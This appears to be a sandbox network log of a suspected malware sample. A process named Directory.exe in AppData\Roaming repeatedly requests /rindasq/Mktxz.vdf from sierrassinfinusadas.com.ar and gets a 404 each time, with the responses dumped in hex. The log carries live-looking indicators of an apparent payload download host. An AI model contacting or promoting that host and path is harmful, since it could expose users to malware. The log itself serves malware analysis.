                                                        2024-11-21 11:56:55 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.650033167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:56 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:57 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:56 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:57 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.650039167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:58 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:59 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:59 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:59 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.650045167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:01 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.650051167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:02 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:03 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:03 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.650058167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:05 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:05 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:05 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:05 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.650064167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:07 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:07 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:07 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:07 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.650068167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:09 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:10 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:09 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:10 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.650070167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:11 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:12 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:12 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:12 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.650072167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:13 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:14 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:14 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:14 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        55192.168.2.650075167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:16 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:16 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:16 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:16 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        56192.168.2.650077167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:18 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:19 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:18 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:19 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        57192.168.2.650081167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:21 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:22 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:22 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:22 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.650083167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:24 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:24 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:24 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:24 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.650085167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:26 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:26 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:26 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:26 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        60192.168.2.650089167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:30 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:30 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:30 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
